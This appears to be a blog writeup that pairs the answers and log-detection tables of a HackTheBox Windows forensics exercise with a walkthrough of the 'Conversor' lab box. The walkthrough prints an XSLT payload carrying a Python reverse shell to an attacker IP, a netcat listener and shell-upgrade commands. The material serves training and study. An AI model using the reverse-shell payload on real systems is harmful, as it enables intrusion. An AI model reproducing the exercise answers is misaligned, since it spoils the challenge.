│                     │                                     │       │                                │          │           │                 │ TargetUserSid: S-1-5-21-387158   │
│                     │                                     │       │                                │          │           │                 │ 2759-1638593395-315824688-1002   │
│                     │                                     │       │                                │          │           │                 │ TargetDomainName: HEISEN-9-WS-   │
│                     │                                     │       │                                │          │           │                 │ 6                                │
│                     │                                     │       │                                │          │           │                 │ TargetLogonId: '0x9f7320'        │
├─────────────────────┼─────────────────────────────────────┼───────┼────────────────────────────────┼──────────┼───────────┼─────────────────┼──────────────────────────────────┤
│ 2025-08-24 23:08:33 │ ‣ User Logoff Event                 │ 1     │ Microsoft-Windows-Security-Aud │ 4634     │ 4488      │ Heisen-9-WS-6   │ TargetUserName: Werni            │
│                     │                                     │       │ iting                          │          │           │                 │ LogonType: 3                     │
│                     │                                     │       │                                │          │           │                 │ TargetUserSid: S-1-5-21-387158   │
│                     │                                     │       │                                │          │           │                 │ 2759-1638593395-315824688-1002   │
│                     │                                     │       │                                │          │           │                 │ TargetDomainName: HEISEN-9-WS-   │
│                     │                                     │       │                                │          │           │                 │ 6                                │
│                     │                                     │       │                                │          │           │                 │ TargetLogonId: '0xb822c7'        │
├─────────────────────┼─────────────────────────────────────┼───────┼────────────────────────────────┼──────────┼───────────┼─────────────────┼──────────────────────────────────┤
│ 2025-08-24 23:10:33 │ ‣ User Logoff Event                 │ 1     │ Microsoft-Windows-Security-Aud │ 4634     │ 4525      │ Heisen-9-WS-6   │ TargetUserName: Werni            │
│                     │                                     │       │ iting                          │          │           │                 │ LogonType: 3                     │
│                     │                                     │       │                                │          │           │                 │ TargetUserSid: S-1-5-21-387158   │
│                     │                                     │       │                                │          │           │                 │ 2759-1638593395-315824688-1002   │
│                     │                                     │       │                                │          │           │                 │ TargetDomainName: HEISEN-9-WS-   │
│                     │                                     │       │                                │          │           │                 │ 6                                │
│                     │                                     │       │                                │          │           │                 │ TargetLogonId: '0xd9de50'        │
├─────────────────────┼─────────────────────────────────────┼───────┼────────────────────────────────┼──────────┼───────────┼─────────────────┼──────────────────────────────────┤
│ 2025-08-24 23:12:33 │ ‣ User Logoff Event                 │ 1     │ Microsoft-Windows-Security-Aud │ 4634     │ 4534      │ Heisen-9-WS-6   │ TargetUserName: Werni            │
│                     │                                     │       │ iting                          │          │           │                 │ LogonType: 3                     │
│                     │                                     │       │                                │          │           │                 │ TargetUserSid: S-1-5-21-387158   │
│                     │                                     │       │                                │          │           │                 │ 2759-1638593395-315824688-1002   │
│                     │                                     │       │                                │          │           │                 │ TargetDomainName: HEISEN-9-WS-   │
│                     │                                     │       │                                │          │           │                 │ 6                                │
│                     │                                     │       │                                │          │           │                 │ TargetLogonId: '0xdb2c73'        │
├─────────────────────┼─────────────────────────────────────┼───────┼────────────────────────────────┼──────────┼───────────┼─────────────────┼──────────────────────────────────┤
│ 2025-08-24 23:14:18 │ ‣ Windows Firewall Settings         │ 1     │ Microsoft-Windows-Windows Fire │ 2002     │ 1554      │ Heisen-9-WS-6   │ ModifyingUser: S-1-5-80-308807   │
│                     │ Have Been Changed                   │       │ wall With Advanced Security    │          │           │                 │ 3201-1464728630-1879813800-110   │
│                     │                                     │       │                                │          │           │                 │ 7566885-823218052                │
│                     │                                     │       │                                │          │           │                 │ SettingValue: '06000000'         │
│                     │                                     │       │                                │          │           │                 │ SettingType: 2                   │
│                     │                                     │       │                                │          │           │                 │ SettingValueSize: 4              │
│                     │                                     │       │                                │          │           │                 │ SettingValueDisplay: Private,P   │
│                     │                                     │       │                                │          │           │                 │ ublic                            │
│                     │                                     │       │                                │          │           │                 │ Origin: 1                        │
│                     │                                     │       │                                │          │           │                 │ ModifyingApplication: ''         │
├─────────────────────┼─────────────────────────────────────┼───────┼────────────────────────────────┼──────────┼───────────┼─────────────────┼──────────────────────────────────┤
│ 2025-08-24 23:14:54 │ ‣ User Logoff Event                 │ 1     │ Microsoft-Windows-Security-Aud │ 4634     │ 4741      │ Heisen-9-WS-6   │ TargetUserName: Werni            │
│                     │                                     │       │ iting                          │          │           │                 │ LogonType: 3                     │
│                     │                                     │       │                                │          │           │                 │ TargetUserSid: S-1-5-21-387158   │
│                     │                                     │       │                                │          │           │                 │ 2759-1638593395-315824688-1002   │
│                     │                                     │       │                                │          │           │                 │ TargetDomainName: HEISEN-9-WS-   │
│                     │                                     │       │                                │          │           │                 │ 6                                │
│                     │                                     │       │                                │          │           │                 │ TargetLogonId: '0x4a8a4'         │
├─────────────────────┼─────────────────────────────────────┼───────┼────────────────────────────────┼──────────┼───────────┼─────────────────┼──────────────────────────────────┤
│ 2025-08-24 23:15:37 │ ‣ Pass the Hash Activity            │ 1     │ Microsoft-Windows-Security-Aud │ 4624     │ 4745      │ Heisen-9-WS-6   │ AuthenticationPackageName: NTL   │
│                     │ 2                                   │       │ iting                          │          │           │                 │ M                                │
│                     │                                     │       │                                │          │           │                 │ LogonProcessName: NtLmSsp        │
│                     │                                     │       │                                │          │           │                 │ TargetOutboundDomainName: '-'    │
│                     │                                     │       │                                │          │           │                 │ TargetLinkedLogonId: '0x0'       │
│                     │                                     │       │                                │          │           │                 │ LmPackageName: NTLM V2           │
│                     │                                     │       │                                │          │           │                 │ TargetDomainName: HEISEN-9-WS-   │
│                     │                                     │       │                                │          │           │                 │ 6                                │
│                     │                                     │       │                                │          │           │                 │ SubjectUserName: '-'             │
│                     │                                     │       │                                │          │           │                 │ TargetUserSid: S-1-5-21-387158   │
│                     │                                     │       │                                │          │           │                 │ 2759-1638593395-315824688-1002   │
│                     │                                     │       │                                │          │           │                 │ IpAddress: 10.129.242.110        │
│                     │                                     │       │                                │          │           │                 │ KeyLength: 0                     │
│                     │                                     │       │                                │          │           │                 │ SubjectLogonId: '0x0'            │
│                     │                                     │       │                                │          │           │                 │ TargetLogonId: '0x54b3d'         │
│                     │                                     │       │                                │          │           │                 │ ElevatedToken: '%%1842'          │
│                     │                                     │       │                                │          │           │                 │ LogonGuid: 00000000-0000-0000-   │
│                     │                                     │       │                                │          │           │                 │ 0000-000000000000                │
│                     │                                     │       │                                │          │           │                 │ RestrictedAdminMode: '-'         │
│                     │                                     │       │                                │          │           │                 │ SubjectDomainName: '-'           │
│                     │                                     │       │                                │          │           │                 │ LogonType: 3                     │
│                     │                                     │       │                                │          │           │                 │ VirtualAccount: '%%1843'         │
│                     │                                     │       │                                │          │           │                 │ TargetOutboundUserName: '-'      │
│                     │                                     │       │                                │          │           │                 │ WorkstationName: '-'             │
│                     │                                     │       │                                │          │           │                 │ IpPort: '37788'                  │
│                     │                                     │       │                                │          │           │                 │ ImpersonationLevel: '%%1833'     │
│                     │                                     │       │                                │          │           │                 │ SubjectUserSid: S-1-0-0          │
│                     │                                     │       │                                │          │           │                 │ TransmittedServices: '-'         │
│                     │                                     │       │                                │          │           │                 │ ProcessId: '0x0'                 │
│                     │                                     │       │                                │          │           │                 │ TargetUserName: Werni            │
│                     │                                     │       │                                │          │           │                 │ ProcessName: '-'                 │
├─────────────────────┼─────────────────────────────────────┼───────┼────────────────────────────────┼──────────┼───────────┼─────────────────┼──────────────────────────────────┤
│ 2025-08-24 23:17:37 │ ‣ User Logoff Event                 │ 1     │ Microsoft-Windows-Security-Aud │ 4634     │ 4812      │ Heisen-9-WS-6   │ TargetUserName: Werni            │
│                     │                                     │       │ iting                          │          │           │                 │ LogonType: 3                     │
│                     │                                     │       │                                │          │           │                 │ TargetUserSid: S-1-5-21-387158   │
│                     │                                     │       │                                │          │           │                 │ 2759-1638593395-315824688-1002   │
│                     │                                     │       │                                │          │           │                 │ TargetDomainName: HEISEN-9-WS-   │
│                     │                                     │       │                                │          │           │                 │ 6                                │
│                     │                                     │       │                                │          │           │                 │ TargetLogonId: '0x54b5d'         │
├─────────────────────┼─────────────────────────────────────┼───────┼────────────────────────────────┼──────────┼───────────┼─────────────────┼──────────────────────────────────┤
│ 2025-08-24 23:19:37 │ ‣ User Logoff Event                 │ 1     │ Microsoft-Windows-Security-Aud │ 4634     │ 4823      │ Heisen-9-WS-6   │ TargetUserName: Werni            │
│                     │                                     │       │ iting                          │          │           │                 │ LogonType: 3                     │
│                     │                                     │       │                                │          │           │                 │ TargetUserSid: S-1-5-21-387158   │
│                     │                                     │       │                                │          │           │                 │ 2759-1638593395-315824688-1002   │
│                     │                                     │       │                                │          │           │                 │ TargetDomainName: HEISEN-9-WS-   │
│                     │                                     │       │                                │          │           │                 │ 6                                │
│                     │                                     │       │                                │          │           │                 │ TargetLogonId: '0x81186'         │
├─────────────────────┼─────────────────────────────────────┼───────┼────────────────────────────────┼──────────┼───────────┼─────────────────┼──────────────────────────────────┤
│ 2025-08-25 19:50:27 │ ‣ Windows Firewall Settings         │ 1     │ Microsoft-Windows-Windows Fire │ 2002     │ 1559      │ Heisen-9-WS-6   │ ModifyingUser: S-1-5-80-308807   │
│                     │ Have Been Changed                   │       │ wall With Advanced Security    │          │           │                 │ 3201-1464728630-1879813800-110   │
│                     │                                     │       │                                │          │           │                 │ 7566885-823218052                │
│                     │                                     │       │                                │          │           │                 │ SettingValue: '06000000'         │
│                     │                                     │       │                                │          │           │                 │ SettingType: 2                   │
│                     │                                     │       │                                │          │           │                 │ SettingValueSize: 4              │
│                     │                                     │       │                                │          │           │                 │ SettingValueDisplay: Private,P   │
│                     │                                     │       │                                │          │           │                 │ ublic                            │
│                     │                                     │       │                                │          │           │                 │ Origin: 1                        │
│                     │                                     │       │                                │          │           │                 │ ModifyingApplication: ''         │
├─────────────────────┼─────────────────────────────────────┼───────┼────────────────────────────────┼──────────┼───────────┼─────────────────┼──────────────────────────────────┤
│ 2025-08-25 19:52:38 │ ‣ Admin User Remote Logon           │ 1     │ Microsoft-Windows-Security-Aud │ 4624     │ 5096      │ Heisen-9-WS-6   │ AuthenticationPackageName: Neg   │
│                     │                                     │       │ iting                          │          │           │                 │ otiate                           │
│                     │                                     │       │                                │          │           │                 │ LogonProcessName: User32         │
│                     │                                     │       │                                │          │           │                 │ TargetOutboundDomainName: '-'    │
│                     │                                     │       │                                │          │           │                 │ TargetLinkedLogonId: '0x0'       │
│                     │                                     │       │                                │          │           │                 │ LmPackageName: '-'               │
│                     │                                     │       │                                │          │           │                 │ TargetDomainName: HEISEN-9-WS-   │
│                     │                                     │       │                                │          │           │                 │ 6                                │
│                     │                                     │       │                                │          │           │                 │ SubjectUserName: HEISEN-9-WS-6   │
│                     │                                     │       │                                │          │           │                 │ $                                │
│                     │                                     │       │                                │          │           │                 │ TargetUserSid: S-1-5-21-387158   │
│                     │                                     │       │                                │          │           │                 │ 2759-1638593395-315824688-500    │
│                     │                                     │       │                                │          │           │                 │ IpAddress: 10.10.16.6            │
│                     │                                     │       │                                │          │           │                 │ KeyLength: 0                     │
│                     │                                     │       │                                │          │           │                 │ SubjectLogonId: '0x3e7'          │
│                     │                                     │       │                                │          │           │                 │ TargetLogonId: '0x862e7'         │
│                     │                                     │       │                                │          │           │                 │ ElevatedToken: '%%1842'          │
│                     │                                     │       │                                │          │           │                 │ LogonGuid: 00000000-0000-0000-   │
│                     │                                     │       │                                │          │           │                 │ 0000-000000000000                │
│                     │                                     │       │                                │          │           │                 │ RestrictedAdminMode: '%%1843'    │
│                     │                                     │       │                                │          │           │                 │ SubjectDomainName: WORKGROUP     │
│                     │                                     │       │                                │          │           │                 │ LogonType: 10                    │
│                     │                                     │       │                                │          │           │                 │ VirtualAccount: '%%1843'         │
│                     │                                     │       │                                │          │           │                 │ TargetOutboundUserName: '-'      │
│                     │                                     │       │                                │          │           │                 │ WorkstationName: HEISEN-9-WS-6   │
│                     │                                     │       │                                │          │           │                 │ IpPort: '0'                      │
│                     │                                     │       │                                │          │           │                 │ ImpersonationLevel: '%%1833'     │
│                     │                                     │       │                                │          │           │                 │ SubjectUserSid: S-1-5-18         │
│                     │                                     │       │                                │          │           │                 │ TransmittedServices: '-'         │
│                     │                                     │       │                                │          │           │                 │ ProcessId: '0x604'               │
│                     │                                     │       │                                │          │           │                 │ TargetUserName: Administrator    │
│                     │                                     │       │                                │          │           │                 │ ProcessName: C:\Windows\System   │
│                     │                                     │       │                                │          │           │                 │ 32\svchost.exe                   │
├─────────────────────┼─────────────────────────────────────┼───────┼────────────────────────────────┼──────────┼───────────┼─────────────────┼──────────────────────────────────┤
│ 2025-08-25 19:53:08 │ ‣ User Logoff Event                 │ 1     │ Microsoft-Windows-Security-Aud │ 4634     │ 5237      │ Heisen-9-WS-6   │ TargetUserName: Administrator    │
│                     │                                     │       │ iting                          │          │           │                 │ LogonType: 3                     │
│                     │                                     │       │                                │          │           │                 │ TargetUserSid: S-1-5-21-387158   │
│                     │                                     │       │                                │          │           │                 │ 2759-1638593395-315824688-500    │
│                     │                                     │       │                                │          │           │                 │ TargetDomainName: HEISEN-9-WS-   │
│                     │                                     │       │                                │          │           │                 │ 6                                │
│                     │                                     │       │                                │          │           │                 │ TargetLogonId: '0x78ed7'         │
├─────────────────────┼─────────────────────────────────────┼───────┼────────────────────────────────┼──────────┼───────────┼─────────────────┼──────────────────────────────────┤
│ 2025-08-25 19:53:21 │ ‣ User Logoff Event                 │ 1     │ Microsoft-Windows-Security-Aud │ 4634     │ 5260      │ Heisen-9-WS-6   │ TargetUserName: Administrator    │
│                     │                                     │       │ iting                          │          │           │                 │ LogonType: 7                     │
│                     │                                     │       │                                │          │           │                 │ TargetUserSid: S-1-5-21-387158   │
│                     │                                     │       │                                │          │           │                 │ 2759-1638593395-315824688-500    │
│                     │                                     │       │                                │          │           │                 │ TargetDomainName: HEISEN-9-WS-   │
│                     │                                     │       │                                │          │           │                 │ 6                                │
│                     │                                     │       │                                │          │           │                 │ TargetLogonId: '0x197eb5'        │
├─────────────────────┼─────────────────────────────────────┼───────┼────────────────────────────────┼──────────┼───────────┼─────────────────┼──────────────────────────────────┤
│ 2025-08-25 19:53:59 │ ‣ User Logoff Event                 │ 1     │ Microsoft-Windows-Security-Aud │ 4634     │ 5271      │ Heisen-9-WS-6   │ TargetUserName: Administrator    │
│                     │                                     │       │ iting                          │          │           │                 │ LogonType: 3                     │
│                     │                                     │       │                                │          │           │                 │ TargetUserSid: S-1-5-21-387158   │
│                     │                                     │       │                                │          │           │                 │ 2759-1638593395-315824688-500    │
│                     │                                     │       │                                │          │           │                 │ TargetDomainName: HEISEN-9-WS-   │
│                     │                                     │       │                                │          │           │                 │ 6                                │
│                     │                                     │       │                                │          │           │                 │ TargetLogonId: '0x1919c9'        │
├─────────────────────┼─────────────────────────────────────┼───────┼────────────────────────────────┼──────────┼───────────┼─────────────────┼──────────────────────────────────┤
│ 2025-08-25 19:54:15 │ ‣ User Logoff Event                 │ 1     │ Microsoft-Windows-Security-Aud │ 4634     │ 5302      │ Heisen-9-WS-6   │ TargetUserName: Administrator    │
│                     │                                     │       │ iting                          │          │           │                 │ LogonType: 7                     │
│                     │                                     │       │                                │          │           │                 │ TargetUserSid: S-1-5-21-387158   │
│                     │                                     │       │                                │          │           │                 │ 2759-1638593395-315824688-500    │
│                     │                                     │       │                                │          │           │                 │ TargetDomainName: HEISEN-9-WS-   │
│                     │                                     │       │                                │          │           │                 │ 6                                │
│                     │                                     │       │                                │          │           │                 │ TargetLogonId: '0x1d8dcd'        │
├─────────────────────┼─────────────────────────────────────┼───────┼────────────────────────────────┼──────────┼───────────┼─────────────────┼──────────────────────────────────┤
│ 2025-08-25 19:57:02 │ ‣ User Logoff Event                 │ 1     │ Microsoft-Windows-Security-Aud │ 4634     │ 5449      │ Heisen-9-WS-6   │ TargetUserName: Administrator    │
│                     │                                     │       │ iting                          │          │           │                 │ LogonType: 3                     │
│                     │                                     │       │                                │          │           │                 │ TargetUserSid: S-1-5-21-387158   │
│                     │                                     │       │                                │          │           │                 │ 2759-1638593395-315824688-500    │
│                     │                                     │       │                                │          │           │                 │ TargetDomainName: HEISEN-9-WS-   │
│                     │                                     │       │                                │          │           │                 │ 6                                │
│                     │                                     │       │                                │          │           │                 │ TargetLogonId: '0x1d2e6e'        │
├─────────────────────┼─────────────────────────────────────┼───────┼────────────────────────────────┼──────────┼───────────┼─────────────────┼──────────────────────────────────┤
│ 2025-08-25 19:57:07 │ ‣ User Logoff Event                 │ 1     │ Microsoft-Windows-Security-Aud │ 4634     │ 5471      │ Heisen-9-WS-6   │ TargetUserName: Administrator    │
│                     │                                     │       │ iting                          │          │           │                 │ LogonType: 7                     │
│                     │                                     │       │                                │          │           │                 │ TargetUserSid: S-1-5-21-387158   │
│                     │                                     │       │                                │          │           │                 │ 2759-1638593395-315824688-500    │
│                     │                                     │       │                                │          │           │                 │ TargetDomainName: HEISEN-9-WS-   │
│                     │                                     │       │                                │          │           │                 │ 6                                │
│                     │                                     │       │                                │          │           │                 │ TargetLogonId: '0x326db7'        │
├─────────────────────┼─────────────────────────────────────┼───────┼────────────────────────────────┼──────────┼───────────┼─────────────────┼──────────────────────────────────┤
│ 2025-08-25 20:03:10 │ ‣ Powershell File and Directory     │ 1     │ Microsoft-Windows-PowerShell   │ 4104     │ 458       │ Heisen-9-WS-6   │ MessageNumber: 1                 │
│                     │ Discovery                           │       │                                │          │           │                 │ ScriptBlockText: "# Copyright    │
│                     │                                     │       │                                │          │           │                 │ © 2008, Microsoft Corporation.   │
│                     │                                     │       │                                │          │           │                 │  All rights reserved.\r\n\r\n\   │
│                     │                                     │       │                                │          │           │                 │ r\n#Common utility functions\r   │
│                     │                                     │       │                                │          │           │                 │ \nImport-LocalizedData -Bindin   │
│                     │                                     │       │                                │          │           │                 │ gVariable localizationString -   │
│                     │                                     │       │                                │          │           │                 │ FileName CL_LocalizationData\r   │
│                     │                                     │       │                                │          │           │                 │ \n\r\n# Function to get user t   │
│                     │                                     │       │                                │          │           │                 │ roubleshooting history\r\nfunc   │
│                     │                                     │       │                                │          │           │                 │ tion Get-UserTSHistoryPath {\r   │
│                     │                                     │       │                                │          │           │                 │ \n  return \"${env:localappdat   │
│                     │                                     │       │                                │          │           │                 │ a}\\diagnostics\"\r\n}\r\n\r\n   │
│                     │                                     │       │                                │          │           │                 │ # Function to get admin troubl   │
│                     │                                     │       │                                │          │           │                 │ eshooting history\r\nfunction    │
│                     │                                     │       │                                │          │           │                 │ Get-AdminTSHistoryPath {\r\n     │
│                     │                                     │       │                                │          │           │                 │ return \"${env:localappdata}\\   │
│                     │                                     │       │                                │          │           │                 │ ...                              │
│                     │                                     │       │                                │          │           │                 │ (use --full to show all content) │
│                     │                                     │       │                                │          │           │                 │ ScriptBlockId: b912e694-25fe-4   │
│                     │                                     │       │                                │          │           │                 │ 6a8-bf50-57249c228c7c            │
│                     │                                     │       │                                │          │           │                 │ MessageTotal: 1                  │
│                     │                                     │       │                                │          │           │                 │ Path: C:\Windows\TEMP\SDIAG_c0   │
│                     │                                     │       │                                │          │           │                 │ ddb614-4bfa-495e-b3ca-10f09ea7   │
│                     │                                     │       │                                │          │           │                 │ fdbf\CL_Utility.ps1              │
├─────────────────────┼─────────────────────────────────────┼───────┼────────────────────────────────┼──────────┼───────────┼─────────────────┼──────────────────────────────────┤
│ 2025-08-25 20:04:18 │ ‣ User Logoff Event                 │ 1     │ Microsoft-Windows-Security-Aud │ 4634     │ 5631      │ Heisen-9-WS-6   │ TargetUserName: Administrator    │
│                     │                                     │       │ iting                          │          │           │                 │ LogonType: 7                     │
│                     │                                     │       │                                │          │           │                 │ TargetUserSid: S-1-5-21-387158   │
│                     │                                     │       │                                │          │           │                 │ 2759-1638593395-315824688-500    │
│                     │                                     │       │                                │          │           │                 │ TargetDomainName: HEISEN-9-WS-   │
│                     │                                     │       │                                │          │           │                 │ 6                                │
│                     │                                     │       │                                │          │           │                 │ TargetLogonId: '0x401462'        │
├─────────────────────┼─────────────────────────────────────┼───────┼────────────────────────────────┼──────────┼───────────┼─────────────────┼──────────────────────────────────┤
│ 2025-08-25 20:04:20 │ ‣ User Logoff Event                 │ 1     │ Microsoft-Windows-Security-Aud │ 4634     │ 5634      │ Heisen-9-WS-6   │ TargetUserName: Administrator    │
│                     │                                     │       │ iting                          │          │           │                 │ LogonType: 3                     │
│                     │                                     │       │                                │          │           │                 │ TargetUserSid: S-1-5-21-387158   │
│                     │                                     │       │                                │          │           │                 │ 2759-1638593395-315824688-500    │
│                     │                                     │       │                                │          │           │                 │ TargetDomainName: HEISEN-9-WS-   │
│                     │                                     │       │                                │          │           │                 │ 6                                │
│                     │                                     │       │                                │          │           │                 │ TargetLogonId: '0x31ea0d'        │
└─────────────────────┴─────────────────────────────────────┴───────┴────────────────────────────────┴──────────┴───────────┴─────────────────┴──────────────────────────────────┘

[+] 136 Detections found on 135 documents

. . .[SOON]. . .

I believe that’s basically all of it and our review supposed to be enough for analysis report:

What was the first (non cd) command executed by the attacker on the host?

systeminfo

Which parent process (full path) spawned the attacker’s commands?

C:\Windows\System32\wbem\WmiPrvSE.exe

Which remote-execution tool was most likely used for the attack?

wmiexec.py

What was the attacker’s IP address?

10.129.242.110

The attacker established multiple persistence mechanisms. What is set as the name of the earliest one created?

SysHelper Update

Identify the script executed by the persistence mechanism.

C:\Users\Werni\AppData\Local\JM.ps1

What local account did the attacker create?

svc_netupd

What domain name did the attacker use for credential exfiltration?

NapoleonsBlackPearl.htb

What password did the attacker's script generate for the newly created user?

Watson_20250824160509

What was the IP address of the internal system the attacker pivoted to?

192.168.1.101

Which TCP port on the victim was forwarded to enable the pivot?

What is the full registry path that stores persistent IPv4→IPv4 TCP listener-to-target mappings?

HKLM\SYSTEM\CurrentControlSet\Services\PortProxy\v4tov4\tcp

What is the MITRE ATT&CK ID associated with the previous technique used by the attacker to pivot to the internal system?

T1090.001

Before the attack, the administrator configured Windows to capture command line details in the event logs. What command did they run to achieve this?

reg add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\Audit" /v ProcessCreationIncludeCmdLine_Enabled /t REG_DWORD /d 1 /f

labs.hackthebox.com/achievement/sherlock/2489228/1072

Happy Defending, Thanks HackTheBox!!

HTB Conversor - Linux (Easy)

Sulaiman — Sat, 21 Mar 2026 13:07:32 GMT

From HTB: -

Kinda finished this box under 20~ mins, All you need to execute are just XXE and your XSL/XSLT reverse-shell would gave you the machine access.

Then PrivEsc to User and root via enumeration, manipulate UID to 0 via binary application on /SBIN.

Network Enumeration and Port Discovery

┌──(kali㉿kali)-[~]
└─$ ping -c2 10.10.11.92      
PING 10.10.11.92 (10.10.11.92) 56(84) bytes of data.
64 bytes from 10.10.11.92: icmp_seq=1 ttl=63 time=910 ms
64 bytes from 10.10.11.92: icmp_seq=2 ttl=63 time=254 ms

--- 10.10.11.92 ping statistics ---
2 packets transmitted, 2 received, 0% packet loss, time 1002ms
rtt min/avg/max/mdev = 254.326/582.331/910.336/328.005 ms

Now with the Network scanning:

┌──(kali㉿kali)-[~]
└─$ sudo nmap -Pn -p- --min-rate 8000 10.10.11.92 -oA nmap/nmapscan
Starting Nmap 7.95 ( https://nmap.org ) at 
Nmap scan report for 10.10.11.92
Host is up (0.26s latency).
Not shown: 65533 closed tcp ports (reset)
PORT   STATE SERVICE
22/tcp open  ssh
80/tcp open  http

We only got 2 ports but no problem:

┌──(kali㉿kali)-[~]
└─$ sudo nmap -Pn -p22,80 -sC -sV -sCV -A -v 10.10.11.92 -oA nmap/nmapscan-ports 
Starting Nmap 7.95 ( https://nmap.org ) at 
NSE: Loaded 157 scripts for scanning.
NSE: Script Pre-scanning.
. . .[SNIP]. . .
Nmap scan report for 10.10.11.92
Host is up (0.26s latency).

PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 8.9p1 Ubuntu 3ubuntu0.13 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   256 01:74:26:39:47:bc:6a:e2:cb:12:8b:71:84:9c:f8:5a (ECDSA)
|_  256 3a:16:90:dc:74:d8:e3:c4:51:36:e2:08:06:26:17:ee (ED25519)
80/tcp open  http    Apache httpd 2.4.52
|_http-server-header: Apache/2.4.52 (Ubuntu)
|_http-title: Did not follow redirect to http://conversor.htb/
| http-methods: 
|_  Supported Methods: GET HEAD POST OPTIONS
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running: Linux 4.X|5.X
OS CPE: cpe:/o:linux:linux_kernel:4 cpe:/o:linux:linux_kernel:5
OS details: Linux 4.15 - 5.19, Linux 5.0 - 5.14
Uptime guess: 30.199 days (since Thu Sep 25 22:14:16 2025)
Network Distance: 2 hops
TCP Sequence Prediction: Difficulty=254 (Good luck!)
IP ID Sequence Generation: All zeros
Service Info: Host: conversor.htb; OS: Linux; CPE: cpe:/o:linux:linux_kernel

TRACEROUTE (using port 80/tcp)
HOP RTT       ADDRESS
1   254.30 ms 10.10.14.1
2   256.64 ms 10.10.11.92

NSE: Script Post-scanning.
Initiating NSE at 03:00
Completed NSE at 03:00, 0.00s elapsed
Initiating NSE at 03:00
Completed NSE at 03:00, 0.00s elapsed
Initiating NSE at 03:00
Completed NSE at 03:00, 0.00s elapsed
Read data files from: /usr/share/nmap
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in seconds
           Raw packets sent: 37 (2.486KB) | Rcvd: 26 (1.818KB)

We got a domain:

conversor.htb

┌──(kali㉿kali)-[~]
└─$ cat nmap/nmapscan-ports.nmap 
# Nmap 7.95 scan initiated as: /usr/lib/nmap/nmap -Pn -p22,80 -sC -sV -sCV -A -v -oA nmap/nmapscan-ports 10.10.11.92
Nmap scan report for 10.10.11.92
Host is up (0.26s latency).

PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 8.9p1 Ubuntu 3ubuntu0.13 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   256 01:74:26:39:47:bc:6a:e2:cb:12:8b:71:84:9c:f8:5a (ECDSA)
|_  256 3a:16:90:dc:74:d8:e3:c4:51:36:e2:08:06:26:17:ee (ED25519)
80/tcp open  http    Apache httpd 2.4.52
|_http-server-header: Apache/2.4.52 (Ubuntu)
|_http-title: Did not follow redirect to http://conversor.htb/
| http-methods: 
|_  Supported Methods: GET HEAD POST OPTIONS
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running: Linux 4.X|5.X
OS CPE: cpe:/o:linux:linux_kernel:4 cpe:/o:linux:linux_kernel:5
OS details: Linux 4.15 - 5.19, Linux 5.0 - 5.14
Uptime guess: 30.199 days (since Thu Sep 25 22:14:16 2025)
Network Distance: 2 hops
TCP Sequence Prediction: Difficulty=254 (Good luck!)
IP ID Sequence Generation: All zeros
Service Info: Host: conversor.htb; OS: Linux; CPE: cpe:/o:linux:linux_kernel

TRACEROUTE (using port 80/tcp)
HOP RTT       ADDRESS
1   254.30 ms 10.10.14.1
2   256.64 ms 10.10.11.92

Read data files from: /usr/share/nmap
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at -- 1 IP address (1 host up) scanned in seconds

WebApp:

http://conversor.htb

WebApp Enumeration and Directory Discovery

Create an account.

Note: You need to create an account for you to access it. And when your in, this is the Interface:

First by seeing the Interface I can already imagine the Back-end processing our payloads could be a foothold for Us:

It’s asking for XML and XSLT File type, so I create this, hopefully this could be our foot-hold,

Here’s a HTTP request for testing:

Great, it’s really taking it, if your’re trying XXE for let’s say /etc/passwd, I don’t think it’s rendering, as example:

It’s the same as regular request:

So what we’re can do It’s crafting a payloads that would processing our payloads and gain us access to the SYSTEM, and a result here’s your kit,

XML:

┌──(kali㉿kali)-[~]
└─$ cat exploit.xml             

exploit

XSLT:

┌──(kali㉿kali)-[~]
└─$ cat exploit.xslt 



  
import os

os.system(
    “python3 -c ‘import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((\”10.10.14.11\”,9001));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call([\”/bin/sh\”,\”-i\”])’”
)

It’s containing the execution of revere-shell in python, hopefully the SYSTEM digest it well.

┌──(kali㉿kali)-[~]
└─$ ls -al               
total 32
drwxr-xr-x   6 root root 4096 Oct 26 03:06 .
drwxr-xr-x 118 root root 4096 Oct 26 02:58 ..
drwxr-xr-x   2 root root 4096 Oct 26 02:58 db
-rw-r--r--   1 root root   46 Oct 26 03:06 exploit.xml
-rw-r--r--   1 root root  643 Oct 26 03:06 exploit.xslt
drwxr-xr-x   2 root root 4096 Oct 26 03:00 nmap
drwxr-xr-x   2 root root 4096 Oct 26 02:58 upload
drwxr-xr-x   2 root root 4096 Oct 26 02:58 www

Reverse Shell initial Foothold and Internal Enumeration

┌──(kali㉿kali)-[~]
└─$ sudo nc -lvnp 9001                                          
listening on [any] 9001 ...

Upload your attack:

┌──(kali㉿kali)-[~]
└─$ sudo nc -lvnp 9001                                          
listening on [any] 9001 ...
connect to [10.10.14.11] from (UNKNOWN) [10.10.11.92] 34274
/bin/sh: 0: which python
can’t access tty; job control turned off
$ python3 -c ‘import pty; pty.spawn(”/bin/bash”)’
$ www-data@conversor:~$ ^Z
zsh: suspended  sudo nc -lvnp 9001
                                                                                                                                                                                                                                            
┌──(kali㉿kali)-[~]
└─$ stty raw -echo; fg
[1]  + continued  sudo nc -lvnp 9001

www-data@conversor:~$ export TERM=xterm
www-data@conversor:~$

That’s it, you get your Shell, upgrade your TTY by:

python3 -c ‘import pty; pty.spawn(”/bin/bash”)’
^Z [CTRL+Z]
stty raw -echo; fg
export TERM=xterm

www-data@conversor:~$ whoami
www-data
www-data@conversor:~$ groups
www-data
www-data@conversor:~$ cd /home
www-data@conversor:/home$ ls -al
total 12
drwxr-xr-x  3 root       root       4096 Jul 31 01:37 .
drwxr-xr-x 19 root       root       4096 Oct 21 05:45 ..
drwxr-x---  5 fismathack fismathack 4096 Oct 26 03:17 fismathack
www-data@conversor:/home$

User:

fismathack

